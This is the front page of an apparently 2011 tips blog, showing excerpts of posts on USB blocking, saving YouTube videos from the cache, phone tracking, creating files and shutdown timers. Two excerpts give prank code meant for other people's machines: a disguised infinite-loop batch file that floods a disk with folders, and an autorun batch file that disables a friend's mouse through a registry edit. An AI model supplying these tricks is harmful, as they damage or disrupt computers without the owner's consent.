February 3, 2011

SOFTWARE TO BLOCK PENDRIVES IN YOUR COMPUTERS

It’s possible to simply disable USB ports support in PC BIOS in order to prevent and forbid computer user from using USB removable flash drive or mass storage device (Portable hard disk drive) to copy and transfer data and files.  But there is another way to do it.. 1.First of all you download this file . 2.After that open that file   3.then make the changes. If you want to disable/enable or disable USB drives on your Windows systems - across your LANthen you need to download this file NOTE: combined versions is available at http://www.intelliadmin.com/USBDisablerPro.msi (trial...

January 26, 2011

DOWNLOAD/SAVE YOUTUBE VIDEO WITHOUT ANY SOFTWARE OR ANY CODES

Its just a trick to save youtube video from browser cache files.. 1.Goto youtube website... 2.Click the video which you want to download... 3.Then play the song.... 4.After that goto cache folder For chrome, C:\Users\Administrator(Select your user account)\\AppData\Local\Google\Chrome\User Data\Default\Cache Then right click->sort by->size (For other browser this location may vary ,just do googling... 5.The files which starts with "f_" is your video file(ex: f_000f11)... 6.Then rename those files with extension .flv(ex: f_000f11.flv) 7.Double click that file to see the video.(flv extension is playable on VLC media player and like...

January 23, 2011

Make over 1,000 folders in few seconds

Here I will teach you simple prank that will make an unlimmited amount of folders in any place you want. Step 1 Open notepad and type : @echo off :top md %random% goto top @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder. md %random% is command that creating folders with random names. goto top – return to label :top , infinite loop Step 2 Save it as 1000folders.bat After that you will get icon that looks as show below People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it Step 3 Right...

January 21, 2011

TRACE YOUR EXACT POSITION OF YOUR MOBILE FOR FREE

Want to trace your mobile phone without any cost... 1.All you need is a Phone or PDA with built in GPS, or with Bluetooth GPS receiver. 2.Goto buddyway website 3.Register your mobile and download the applicaction to your mobile phone 4.By this you can..... Track & save your trips Share them with friends View your trips in 3D in Google Earth Show friends your location 5.Its also used to find your mobiles when the mobile is stolen by others...

January 20, 2011

Disable Your Friend’s Mouse Whenever USB Disk Is Inserted

In this short time pass tutorial, I am going to show you how to disable your friend’s mouse whenever your USB drive is inserted.To get this feature working, you must make sure that your friend has not disabled autorun for removable media. However you may get this to work by creating a fake icon for the batch program.First we’ll create a batch file and then we’ll be creating autorun.inf file. Then we’ll be pasting it in the root of USB drive. Now whenever the USB drive is inserted, system will look for autorun.inf. Autorun.inf will execute that batch file disabling the mouse.@echo off set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg...

January 17, 2011

Create A Huge File - Fun Trick

FIRST STEP: You can create a file of any size using nothing more than what's supplied with Windows. Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240. SECOND STEP: 1.Now open a command prompt window. 2.In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000,...

January 16, 2011

Auto Shutdown Pc without using any external program( 3 methods )

METHOD # 1 Do you know that you can make your PC shutdown at a time u wish to? Here is the trick!! How To Make A Shutdown Timer! Step 1: Right click on your desktop and choose "New=>shortcuts". Step 2: In the box that says "Type the location of the shortcut", type in "shutdown -s -t 3600" without the quotation marks and click next. Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs. Step 3: Make up a name for the shortcut and you're done. You can change the icon by right clicking=>properities=>change icon=>browse. To abort: To make an abort key to stop the shutdown timer...

Pages 41234 »